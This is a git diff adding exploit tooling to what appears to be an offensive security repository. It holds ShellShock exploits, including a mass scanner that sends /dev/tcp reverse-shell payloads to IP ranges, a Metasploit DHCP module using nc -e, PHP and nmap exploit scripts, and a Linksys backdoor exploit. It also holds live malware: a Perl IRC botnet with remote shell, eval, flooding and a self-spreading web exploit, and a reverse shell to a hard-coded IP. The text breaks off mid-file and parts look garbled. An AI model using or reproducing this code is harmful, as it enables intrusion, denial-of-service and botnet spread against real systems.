diff --git a/802.11 /crack_linksys.py b/802.11 /crack_linksys.py new file mode 100644 index 0000000..9305567 --- /dev/null +++ b/802.11 /crack_linksys.py @@ -0,0 +1,29 @@ +import socket +import struct +import sys + +#HOST = '192.168.1.1' +HOST = '192.168.33.1' +PORT = 32764 + +def send_message(s, message, payload=''): + header = struct.pack('/dev/null +X='() { function a a>\' bash -c echo 2>/dev/null > /dev/null +if [ -e echo ]; then + echo -e "\033[91mVulnerable to CVE-2014-7169 (taviso bug)\033[39m" +else + echo -e "\033[92mNot vulnerable to CVE-2014-7169 (taviso bug)\033[39m" +fi + +bash -c "true $(printf '</dev/null +if [ $? != 0 ]; then + echo -e "\033[91mVulnerable to CVE-2014-7186 (redir_stack bug)\033[39m" +else + echo -e "\033[92mNot vulnerable to CVE-2014-7186 (redir_stack bug)\033[39m" +fi + +bash -c "`for i in {1..200}; do echo -n "for x$i in; do :;"; done; for i in {1..200}; do echo -n "done;";done`" 2>/dev/null +if [ $? != 0 ]; then + echo -e "\033[91mVulnerable to CVE-2014-7187 (nested loops off by one)\033[39m" +else + echo -e "\033[96mTest for CVE-2014-7187 not reliable without address sanitizer\033[39m" +fi + +r=`a="() { echo x;}" bash -c a 2>/dev/null` +if [ -n "$r" ]; then + echo -e "\033[93mVariable function parser still active, likely vulnerable to yet unknown parser bugs like CVE-2014-6277 (lcamtuf bug)\033[39m" +else + echo -e "\033[92mVariable function parser inactive, likely safe from unknown parser bugs\033[39m" +fi diff --git a/OS_Injections/ShellShocker/scripts/cgi-bin-reverse-shell.py b/OS_Injections/ShellShocker/scripts/cgi-bin-reverse-shell.py new file mode 100644 index 0000000..546f1f0 --- /dev/null +++ b/OS_Injections/ShellShocker/scripts/cgi-bin-reverse-shell.py @@ -0,0 +1,21 @@ +# +#CVE-2014-6271 cgi-bin reverse shell +# + +import httplib,urllib,sys + +if (len(sys.argv)<4): + print "Usage: %s " % sys.argv[0] + print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0] + exit(0) + +conn = httplib.HTTPConnection(sys.argv[1]) +reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3] + +headers = {"Content-type": "application/x-www-form-urlencoded", + "test":reverse_shell } +conn.request("GET",sys.argv[2],headers=headers) +res = conn.getresponse() +print res.status, res.reason +data = res.read() +print data \ No newline at end of file diff --git a/OS_Injections/ShellShocker/scripts/check.py b/OS_Injections/ShellShocker/scripts/check.py new file mode 100644 index 0000000..e4f0a8a --- /dev/null +++ b/OS_Injections/ShellShocker/scripts/check.py @@ -0,0 +1,68 @@ +We are... + _____ _________ + / _ \ ____ ____ ____ / _____/ ____ ____ + / /_\ \ / \ / _ \ / \ \_____ \_/ __ \_/ ___\ + / | \ | ( <_> ) | \/ \ ___/\ \___ + \____|__ /___| /\____/|___| /_______ /\___ >\___ > + \/ \/ \/ \/ \/ \/ + //Laughing at your security since 2012* +================================================================================================= +Official Members: Mrlele - AnonSec666 - 3r3b0s - 4prili666h05t - Hannaichi - ap3x h4x0r - d3f4ult + - Gh05tFr3ak - xCyb3r 3vil7 - Hassouna Khalil - spider64 +================================================================================================= + +# \!/ Enter your No-Ip address or other listening address in line 57 \!/ +# \!/ Launch nc -l 31337 before executing script! \!/ +# Dont forgets to update bash so you donts get PWNed while "testing"... lol +# yum -y update bash; apt-get -y update bash; reboot +# (Script is coded in python2.7, errors running with python3.0) + +import httplib,urllib + +print "###########################################################" +print "### ShellShock.py ###" +print "### Bash 0-day Environment Variable Injector ###" +print "### CVE-2014-6271 ###" +print "### *************************************************** ###" +print "### ###" +print "### It's either shell or be shelled ###" +print "### ###" +print "### _.-''|''-._ ###" +print "### .-' | `-. ###" +print "### .'\ | /`. ###" +print "### .' \ | / `. ###" +print "### \ \ | / / ###" +print "### `\ \ | / /' ###" +print "### `\ \ | / /' ###" +print "### `\ \ | / /' ###" +print "### _.-`\ \ | / /'-._ ###" +print "### {_____`\\|//'______} ###" +print "### `-' ###" +print "### ###" +print "### twitter.com/_d3f4ult ###" +print "###########################################################" +print "\n" +print '\t\!/ Reverse shell returned on port 31337 \!/\n' +print '\t Enter The First Three IP ranges To Scan \n' +url = raw_input(" [Example : 123.456.789] : ") +finput = input("Enter the Starting IP of Range to Scan : ") +sinput = input("Enter the Ending IP of Range to Scan for : ") +print + +path = raw_input("Enter Vuln CGI Path : ") + +for x in range(finput,sinput + 1): + murl = url + "." + str(x) + conn = httplib.HTTPConnection(murl) + reverse_shell='() { :; }; /bin/bash -i >& /dev/tcp/NO-IP/31337 0>&1' + headers = {"Content-type": "application/x-www-form-urlencoded", + "test": reverse_shell} + conn.request("GET",path,headers=headers) + res = conn.getresponse() + + if str(res.status) == '200': + print "[+] Website Present and Payload Successfully Sent To " + murl + path + data = res.read() + print data + else: + print "[!]" + murl + path + " Is Not Vulnerable." \ No newline at end of file diff --git a/OS_Injections/ShellShocker/scripts/dhclient_bash_env.rb b/OS_Injections/ShellShocker/scripts/dhclient_bash_env.rb new file mode 100644 index 0000000..2472f24 --- /dev/null +++ b/OS_Injections/ShellShocker/scripts/dhclient_bash_env.rb @@ -0,0 +1,84 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'rex/proto/dhcp' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::DHCPServer + + def initialize + super( + 'Name' => 'DHCP Client Bash Environment Variable Code Injection', + 'Description' => %q{ + This module exploits a code injection in specially crafted environment + variables in Bash, specifically targeting dhclient network configuration + scripts through the HOSTNAME, DOMAINNAME, and URL DHCP options. + }, + 'Author' => + [ + 'scriptjunkie', 'apconole[at]yahoo.com', # Original DHCP Server auxiliary module + 'Stephane Chazelas', # Vulnerability discovery + 'Ramon de C Valle' # This module + ], + 'License' => MSF_LICENSE, + 'Actions' => + [ + [ 'Service' ] + ], + 'PassiveActions' => + [ + 'Service' + ], + 'DefaultAction' => 'Service', + 'References' => [ + ['CVE', '2014-6271'], + ['CWE', '94'], + ['OSVDB', '112004'], + ['EDB', '34765'], + ['URL', 'https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/'], + ['URL', 'http://seclists.org/oss-sec/2014/q3/649',], + ['URL', 'https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/',] + ], + 'DisclosureDate' => 'Sep 24 2014' + ) + + register_options( + [ + OptString.new('CMD', [ true, 'The command to run', '/bin/nc -e /bin/sh 127.0.0.1 4444']) + ], self.class) + + deregister_options('DOMAINNAME', 'HOSTNAME', 'URL') + end + + def run + value = "() { :; }; PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin #{datastore['CMD']}" + + hash = datastore.copy + hash['DOMAINNAME'] = value + hash['HOSTNAME'] = value + hash['URL'] = value + + # This loop is required because the current DHCP Server exits after the + # first interaction. + loop do + begin + start_service(hash) + + while @dhcp.thread.alive? + select(nil, nil, nil, 2) + end + + rescue Interrupt + break + + ensure + stop_service + end + end + end + +end diff --git a/OS_Injections/ShellShocker/scripts/exploit.nse b/OS_Injections/ShellShocker/scripts/exploit.nse new file mode 100644 index 0000000..670715c --- /dev/null +++ b/OS_Injections/ShellShocker/scripts/exploit.nse @@ -0,0 +1,119 @@ +description = [[ +Attempts to exploit the vulnerability known as "shellshock" against web applications via HTTP headers. By default it simply echoes back a random string but other commands may be injected. + +To detect this vulnerability the script executes a command that prints a random string and then looks for it inside the page's body. + +Vulnerability originally discovered by Stephane Chazelas. + +References: +* http://www.openwall.com/lists/oss-security/2014/09/24/10 +* http://seclists.org/oss-sec/2014/q3/685 +* +]] + +-- @usage +-- nmap -sV -p- --script http-shellshock +-- nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls +-- @output +-- PORT STATE SERVICE REASON +-- 80/tcp open http syn-ack +-- | http-shellshock: +-- | VULNERABLE: +-- | HTTP Shellshock vulnerability +-- | State: VULNERABLE (Exploitable) +-- | IDs: CVE:CVE-2014-6271 +-- | This web application might be affected by the vulnerability known as Shellshock. It seems the server +-- | is executing commands injected via malicious HTTP headers. +-- | +-- | Disclosure date: 2014-09-24 +-- | References: +-- | http://www.openwall.com/lists/oss-security/2014/09/24/10 +-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169 +-- | http://seclists.org/oss-sec/2014/q3/685 +-- |_ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271 +-- +-- @xmloutput +-- HTTP Shellshock vulnerability +-- VULNERABLE (Exploitable) +-- +-- CVE:CVE-2014-6271 +--
+-- +-- This web application might be affected by the vulnerability known as Shellshock. It seems the server is executing commands injected via malicious HTTP headers. +--
+-- +--
+-- 2014 +-- 24 +-- 09 +--
+-- +-- 2014-09-24 +-- +-- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169 +-- http://www.openwall.com/lists/oss-security/2014/09/24/10 +-- http://seclists.org/oss-sec/2014/q3/685 +-- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271 +--
+-- @args http-shellshock.uri URI. Default: / +-- @args http-shellshock.header HTTP header to use in requests. Default: User-Agent +-- @args http-shellshock.cmd Custom command to send inside payload. Default: nil +--- +author = {"Paulino Calderon "} +license = "Same as Nmap--See http://nmap.org/book/man-legal.html" +categories = {"exploit","vuln","intrusive"} + +local http = require "http" +local shortport = require "shortport" +local stdnse = require "stdnse" +local vulns = require "vulns" + +portrule = shortport.http + +action = function(host, port) + local cmd = stdnse.get_script_args(SCRIPT_NAME..".cmd") or nil + local http_header = stdnse.get_script_args(SCRIPT_NAME..".header") or "User-Agent" + local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or '/' + + local rnd = stdnse.generate_random_string(15) + local payload = '() { :;}; echo; echo "'..rnd..'"' + if cmd ~= nil then + cmd = '() { :;}; '..cmd + end + -- Plant the payload in the HTTP headers + local options = {header={}} + options["no_cache"] = true + options["header"][http_header] = payload + + stdnse.debug(1, string.format("Sending '%s' via HTTP header '%s'", payload, http_header)) + local req = http.get(host, port, uri, options) + if req.status == 200 and string.match(req.body, rnd) ~= nil then + local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) + local vuln = { + title = 'HTTP Shellshock vulnerability', + state = vulns.STATE.NOT_VULN, + description = [[ +This web application might be affected by the vulnerability known as Shellshock. It seems the server +is executing commands injected via malicious HTTP headers. + ]], + IDS = {CVE = 'CVE-2014-6271'}, + references = { + 'http://www.openwall.com/lists/oss-security/2014/09/24/10', + 'http://seclists.org/oss-sec/2014/q3/685', + 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169' + }, + dates = { + disclosure = {year = '2014', month = '09', day = '24'}, + }, + } + stdnse.debug(1, string.format("Random pattern '%s' was found in page. Host seems vulnerable.", rnd)) + vuln.state = vulns.STATE.EXPLOIT + if cmd ~= nil then + options["header"][http_header] = cmd + stdnse.debug(1, string.format("Sending '%s' via HTTP header '%s'", cmd, http_header)) + req = http.get(host, port, uri, options) + vuln.exploit_results = req.body + end + return vuln_report:make_output(vuln) + end +end diff --git a/OS_Injections/ShellShocker/scripts/exploit.php b/OS_Injections/ShellShocker/scripts/exploit.php new file mode 100644 index 0000000..3c0f5c0 --- /dev/null +++ b/OS_Injections/ShellShocker/scripts/exploit.php @@ -0,0 +1,47 @@ +/cgi-bin/ -c cmd + Eg. php bash.php -u http://localhost/cgi-bin/hello -c "wget http://appknox.com -O /tmp/shit" +Reference: https://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/ + +Test CGI Code : #!/bin/bash + echo "Content-type: text/html" + echo "" + echo "Bash-is-Vulnerable" + +*/ +error_reporting(0); +if(!defined('STDIN')) die("Please run it through command-line!\n"); +$x = getopt("u:c:"); +if(!isset($x['u']) || !isset($x['c'])) +{ + die("Usage: ".$_SERVER['PHP_SELF']." -u URL -c cmd\n"); + +} +$url = $x['u']; +$cmd = $x['c']; + +$context = stream_context_create( + array( + 'http' => array( + 'method' => 'GET', + 'header' => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"' + ) + ) +); +$req = file_get_contents($url, false, $context); +if(!$req && strpos($http_response_header[0],"500") > 0 ) + die("Command sent to the server!\n"); +else if($req && !strpos($http_response_header[0],"500") > 0) + die("Server didn't respond as it should!\n"); +else if(!$req && $http_response_header == NULL) + die("A connection error occurred!\n") +?> diff --git a/OS_Injections/ShellShocker/scripts/paylod.pl b/OS_Injections/ShellShocker/scripts/paylod.pl new file mode 100644 index 0000000..e517963 --- /dev/null +++ b/OS_Injections/ShellShocker/scripts/paylod.pl @@ -0,0 +1,527 @@ +#!/usr/bin/perl +# this spreader is coded by xdh +# xdh@xxxxxxxxxxx +# only for testing... + +my @nickname = ("|PHP|"); + +my $nick = $nickname[rand scalar @nickname]; + +my $ircname = $nickname[rand scalar @nickname]; + + +#system("kill -9 `ps ax |grep httpdse |grep -v grep|awk '{print $1;}'`"); +my $processo = '/usr/sbin/atd'; + + +# funny world... + +my $linas_max='6'; +my $sleep='5'; +my @adms=("JB","x"); +my @hostauth=("fuckoff","localhost"); +my @canais=("#new"); +chop (my $realname = 'vn'); +$servidor='185.31.209.84' unless $servidor; +my $porta='443'; +my $VERSAO = 'BUCEFALO'; +$SIG{'INT'} = 'IGNORE'; +$SIG{'HUP'} = 'IGNORE'; +$SIG{'TERM'} = 'IGNORE'; +$SIG{'CHLD'} = 'IGNORE'; +$SIG{'PS'} = 'IGNORE'; +use IO::Socket; +use Socket; +use IO::Select; +chdir("/tmp"); +#$servidor="$ARGV[0]" if $ARGV[0]; +$0="$processo"."\0"x16;; +my $pid=fork; +exit if $pid; +die "Problema com o fork: $!" unless defined($pid); + +our %irc_servers; +our %DCC; +my $dcc_sel = new IO::Select->new(); + +$sel_cliente = IO::Select->new(); +sub sendraw { + if ($#_ == '1') { + my $socket = $_[0]; + print $socket "$_[1]\n"; + } else { + print $IRC_cur_socket "$_[0]\n"; + } +} + +sub conectar { + my $meunick = $_[0]; + my $servidor_con = $_[1]; + my $porta_con = $_[2]; + + my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1); + if (defined($IRC_socket)) { + $IRC_cur_socket = $IRC_socket; + + $IRC_socket->autoflush(1); + $sel_cliente->add($IRC_socket); + + $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con"; + $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con"; + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; + $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost; + nick("$meunick"); + sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname"); + sendraw("PASS swedenrocks"); + sleep 1; + } +} +my $line_temp; +while( 1 ) { + while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); } + delete($irc_servers{''}) if (defined($irc_servers{''})); + my @ready = $sel_cliente->can_read(0); + next unless(@ready); + foreach $fh (@ready) { + $IRC_cur_socket = $fh; + $meunick = $irc_servers{$IRC_cur_socket}{'nick'}; + $nread = sysread($fh, $msg, 4096); + if ($nread == 0) { + $sel_cliente->remove($fh); + $fh->close; + delete($irc_servers{$fh}); + } + @lines = split (/\n/, $msg); + + for(my $c=0; $c<= $#lines; $c++) { + $line = $lines[$c]; + $line=$line_temp.$line if ($line_temp); + $line_temp=''; + $line =~ s/\r$//; + unless ($c == $#lines) { + parse("$line"); + } else { + if ($#lines == 0) { + parse("$line"); + } elsif ($lines[$c] =~ /\r$/) { + parse("$line"); + } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { + parse("$line"); + } else { + $line_temp = $line; + } + } + } + } +} + +sub parse { + my $servarg = shift; + if ($servarg =~ /^PING \:(.*)/) { + sendraw("PONG :$1"); + } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { + my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5; + if ($args =~ /^\001VERSION\001$/) { + notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001"); + } + if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) { + if (grep {$_ =~ /^\Q$pn\E$/i } @adms) { + if ($onde eq "$meunick"){ + shell("$pn", "$args"); + } + if ($args =~ /^(\Q$meunick\E|\.say)\s+(.*)/ ) { + my $natrix = $1; + my $arg = $2; + if ($arg =~ /^\!(.*)/) { + ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/); + } elsif ($arg =~ /^\@(.*)/) { + $ondep = $onde; + $ondep = $pn if $onde eq $meunick; + bfunc("$ondep","$1"); + } else { + shell("$onde", "$arg"); + } + } + } + } + } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { + if (lc($1) eq lc($meunick)) { + $meunick=$4; + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; + } + } elsif ($servarg =~ m/^\:(.+?)\s+433/i) { + nick("$meunick".int rand(9999)); + } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { + $meunick = $2; + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; + $irc_servers{$IRC_cur_socket}{'nome'} = "$1"; + foreach my $canal (@canais) { + sendraw("JOIN $canal ddosit"); + } + } +} + + +sub bfunc { + my $printl = $_[0]; + my $funcarg = $_[1]; + if (my $pid = fork) { + waitpid($pid, 0); + } else { + if (fork) { + exit; + } else { + if ($funcarg =~ /^portscan (.*)/) { + my $hostip="$1"; + my +@portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018"); + my (@aberta, %porta_banner); + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports."); + foreach my $porta (@portas) { + my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout +=> 4); + if ($scansock) { + push (@aberta, $porta); + $scansock->close; + } + } + + if (@aberta) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta"); + } else { + sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found"); + } + } + if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds."); + my $itime = time; + my ($cur_time); + $cur_time = time - $itime; + while ($3>$cur_time){ + $cur_time = time - $itime; + &tcpflooder("$1","$2","$3"); + } + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2."."); + } + if ($funcarg =~ /^version/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 perlb0t ver ".$VERSAO); + } + if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched INDEXU for ".$1." +seconds."); + srand; + my $itime = time; + my ($cur_time); + my ($exploited); + $boturl=$2; + $cur_time = time - $itime;$exploited = 0; + while($1>$cur_time){ + $cur_time = time - $itime; + @urls=fetch(); + foreach $url (@urls) { + $cur_time = time - $itime; + my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/; + $url =$path."/SQuery/lib/gore.php?libpath=$boturl?"; + $page = http_query($url); + $exploited = $exploited + 1; + } + } + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1." +seconds."); + } + if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds."); + my $itime = time; + my ($cur_time); + $cur_time = time - $itime; + while ($2>$cur_time){ + $cur_time = time - $itime; + my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80); + print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n"; + close($socket); + } + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1."."); + } + if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for +".$3." seconds."); + my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3"); + $dtime = 1 if $dtime == 0; + my %bytes; + $bytes{igmp} = $2 * $pacotes{igmp}; + $bytes{icmp} = $2 * $pacotes{icmp}; + $bytes{o} = $2 * $pacotes{o}; + $bytes{udp} = $2 * $pacotes{udp}; + $bytes{tcp} = $2 * $pacotes{tcp}; + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent +".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1."."); + } + exit; + } + } +} + +sub ircase { + my ($kem, $printl, $case) = @_; + + if ($case =~ /^join (.*)/) { + j("$1"); + } + if ($case =~ /^part (.*)/) { + p("$1"); + } + if ($case =~ /^rejoin\s+(.*)/) { + my $chan = $1; + if ($chan =~ /^(\d+) (.*)/) { + for (my $ca = 1; $ca <= $1; $ca++ ) { + p("$2"); + j("$2"); + } + } else { + p("$chan"); + j("$chan"); + } + } + if ($case =~ /^op/) { + op("$printl", "$kem") if $case eq "op"; + my $oarg = substr($case, 3); + op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); + } + if ($case =~ /^deop/) { + deop("$printl", "$kem") if $case eq "deop"; + my $oarg = substr($case, 5); + deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); + } + if ($case =~ /^msg\s+(\S+) (.*)/) { + msg("$1", "$2"); + } + if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) { + for (my $cf = 1; $cf <= $1; $cf++) { + msg("$2", "$3"); + } + } + if ($case =~ /^ctcp\s+(\S+) (.*)/) { + ctcp("$1", "$2"); + } + if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) { + for (my $cf = 1; $cf <= $1; $cf++) { + ctcp("$2", "$3"); + } + } + if ($case =~ /^nick (.*)/) { + nick("$1"); + } + if ($case =~ /^connect\s+(\S+)\s+(\S+)/) { + conectar("$2", "$1", 6667); + } + if ($case =~ /^raw (.*)/) { + sendraw("$1"); + } + if ($case =~ /^eval (.*)/) { + eval "$1"; + } +} + +sub shell { + my $printl=$_[0]; + my $comando=$_[1]; + if ($comando =~ /cd (.*)/) { + chdir("$1") || msg("$printl", "No such file or directory"); + return; + } + elsif ($pid = fork) { + waitpid($pid, 0); + } else { + if (fork) { + exit; + } else { + my @resp=`$comando 2>&1 3>&1`; + my $c=0; + foreach my $linha (@resp) { + $c++; + chop $linha; + sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha"); + if ($c == "$linas_max") { + $c=0; + sleep $sleep; + } + } + exit; + } + } +} + +sub tcpflooder { + my $itime = time; + my ($cur_time); + my ($ia,$pa,$proto,$j,$l,$t); + $ia=inet_aton($_[0]); + $pa=sockaddr_in($_[1],$ia); + $ftime=$_[2]; + $proto=getprotobyname('tcp'); + $j=0;$l=0; + $cur_time = time - $itime; + while ($l<1000){ + $cur_time = time - $itime; + last if $cur_time >= $ftime; + $t="SOCK$l"; + socket($t,PF_INET,SOCK_STREAM,$proto); + connect($t,$pa)||$j--; + $j++;$l++; + } + $l=0; + while ($l<1000){ + $cur_time = time - $itime; + last if $cur_time >= $ftime; + $t="SOCK$l"; + shutdown($t,2); + $l++; + } +} + +sub udpflooder { + my $iaddr = inet_aton($_[0]); + my $msg = 'A' x $_[1]; + my $ftime = $_[2]; + my $cp = 0; + my (%pacotes); + $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0; + + socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++; + socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++; + socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++; + socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++; + return(undef) if $cp == 4; + my $itime = time; + my ($cur_time); + while ( 1 ) { + for (my $porta = 1; $porta <= 65000; $porta++) { + $cur_time = time - $itime; + last if $cur_time >= $ftime; + send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++; + send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++; + send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++; + send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++; + + for (my $pc = 3; $pc <= 255;$pc++) { + next if $pc == 6; + $cur_time = time - $itime; + last if $cur_time >= $ftime; + socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next; + send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++; + } + } + last if $cur_time >= $ftime; + } + return($cur_time, %pacotes); +} + +sub ctcp { + return unless $#_ == 1; + sendraw("PRIVMSG $_[0] :\001$_[1]\001"); +} +sub msg { + return unless $#_ == 1; + sendraw("PRIVMSG $_[0] :$_[1]"); +} +sub notice { + return unless $#_ == 1; + sendraw("NOTICE $_[0] :$_[1]"); +} +sub op { + return unless $#_ == 1; + sendraw("MODE $_[0] +o $_[1]"); +} +sub deop { + return unless $#_ == 1; + sendraw("MODE $_[0] -o $_[1]"); +} +sub j { &join(@_); } +sub join { + return unless $#_ == 0; + sendraw("JOIN $_[0]"); +} +sub p { part(@_); } +sub part { + sendraw("PART $_[0]"); +} +sub nick { + return unless $#_ == 0; + sendraw("NICK $_[0]"); +} +sub quit { + sendraw("QUIT :$_[0]"); +} + +# Spreader +# this 'spreader' code isnot mine, i dont know who coded it. +# update: well, i just fix0red this shit a bit. +# + +sub fetch(){ + my $rnd=(int(rand(9999))); + my $n= 80; + if ($rnd<5000) { $n<<=1;} + my $s= (int(rand(10)) * $n); + +my @dominios = ("com","net","org","info","gov", "gob","gub","xxx", +"eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec", + +"py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop", + +"af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi", + "vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk", + +"ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir", + +"iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke", + +"ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm", + +"na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc", + + +"sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz", + "vu","vn","ye","yu","cd","zm","zw",""); +my @str; + +foreach $dom (@dominios) +{ + push (@str,"%22inurl%3Amodules.php%3Fname%3DSQuery%22+site%3A".$dom."%20"); +} + + my $query="www.google.com/search?q="; + $query.=$str[(rand(scalar(@str)))]; + $query.="&num=$n&start=$s"; + my @lst=(); + my $page = http_query($query); + while ($page =~ m/\"]+)\"?>/g){ + if ($1 !~ m/google|cache|translate/){ + push (@lst,$1); + } + } + return (@lst); +} + +sub http_query($){ + my ($url) = @_; + my $host=$url; + my $query=$url; + my $page=""; + $host =~ s/href=\"?http:\/\///; + $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; + $query =~s/$host//; + if ($query eq "") {$query="/";}; + eval { + local $SIG{ALRM} = sub { die "1";}; + alarm 10; + my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return; + print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; + my @r = <$sock>; + $page="@r"; + alarm 0; + close($sock); + }; + return $page; + +} \ No newline at end of file diff --git a/OS_Injections/ShellShocker/scripts/paylod_2.pl b/OS_Injections/ShellShocker/scripts/paylod_2.pl new file mode 100644 index 0000000..13a3666 --- /dev/null +++ b/OS_Injections/ShellShocker/scripts/paylod_2.pl @@ -0,0 +1,107 @@ +#!/usr/bin/perl -w + +use IO::Socket; +use Fcntl; + +# IOCTLs +$TIOCGPTN = -2147199952; +$TIOCSPTLCK = 1074025521; +$EAGAIN=11; + +print "pmsh.pl v0.1 (c) 2006 Michael Schierl \n"; + +$HOST="72.167.37.182"; +$PORT="23"; + +$0="apache"; + +print "Connecting to $HOST:$PORT... "; + +$sock = new IO::Socket::INET ( + PeerAddr => $HOST, + PeerPort => $PORT, + Proto => 'tcp', + Blocking => 0, 